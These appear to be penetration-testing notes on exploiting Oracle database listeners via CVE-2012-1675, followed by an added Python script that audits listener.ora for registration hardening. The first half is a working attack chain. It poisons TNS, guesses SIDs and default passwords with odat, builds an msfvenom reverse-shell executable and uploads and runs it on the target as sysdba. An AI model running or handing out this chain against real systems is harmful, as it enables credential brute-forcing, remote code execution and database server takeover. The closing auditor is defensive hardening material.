Oracle exploitation:

Tools: https://github.com/bongbongco/CVE-2012-1675

nmap -Pn -sT --script=./oracle-tns-poison -p 1521 IP

If it's vulnerable, use odat:

1. python3 odat.py sidguesser -s IP -p 1521

2. Double-check that the system is vulnerable (if the SID is XE):

python3 odat.py tnspoison -s IP -d XE --test-module

3. Obtain creds:

python3 odat.py passwordguesser -s IP -p 1521 --accounts-file oracle_default_userpass.txt -d XE 

4. Once you find creds, you can upload malicious files!

Generate it with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f exe > gori.exe 

Upload with odat.py:

python3 odat.py utlfile -s IP -d XE -U USERNAME -P PASSWORD --sysdba --putFile C:/ gori.exe ./gori.exe

Execute the file:

python3 odat.py externaltable -s IP -d XE -U USERNAME -P PASSWORD --sysdba --exec C:/ gori.exe
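
A defender-side counterpart to the TNS poison check in step 2, as an added example (not part of the original notes or of odat): it reads a listener.ora and reports whether an explicit setting restricts remote service registration, the feature CVE-2012-1675 abuses. The listener name LISTENER and both sample files are constructed; releases that enable valid node checking by default can be protected with no explicit line, so an empty result means "not configured here", not "vulnerable".

```python
import re

# Values of VALID_NODE_CHECKING_REGISTRATION_<listener> that enable the check.
VNCR_ON = {"ON", "1", "LOCAL", "SUBNET", "2"}

def parse_params(text):
    """Return {NAME: VALUE} for top-level 'NAME = value' lines of listener.ora."""
    params = {}
    for line in text.splitlines():
        m = re.match(r"([A-Za-z0-9_]+)\s*=\s*(\S.*)$", line.split("#", 1)[0].strip())
        if m:
            params[m.group(1).upper()] = m.group(2).strip().upper()
    return params

def audit_listener(text, listener="LISTENER"):
    """Return (explicitly_mitigated, reasons) for the named listener."""
    p, name, reasons = parse_params(text), listener.upper(), []
    vncr = p.get("VALID_NODE_CHECKING_REGISTRATION_" + name)
    if vncr in VNCR_ON:
        reasons.append("valid node checking for registration: " + vncr)
    if p.get("DYNAMIC_REGISTRATION_" + name) == "OFF":
        reasons.append("dynamic registration disabled")
    # COST: registration accepted only over the listed transports.
    transports = set(re.findall(r"[A-Z]+", p.get("SECURE_REGISTER_" + name, "")))
    if transports and transports <= {"IPC", "TCPS"}:
        reasons.append("COST limits registration to " + ",".join(sorted(transports)))
    return bool(reasons), reasons

# Constructed sample files (hostnames are placeholders).
WEAK = """\
LISTENER =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example)(PORT = 1521)))
"""
HARDENED = WEAK + """\
VALID_NODE_CHECKING_REGISTRATION_LISTENER = LOCAL
SECURE_REGISTER_LISTENER = (IPC)
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK), ("hardened", HARDENED)):
        ok, why = audit_listener(conf)
        print(label, "explicit mitigation" if ok else "no explicit mitigation", why)
```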
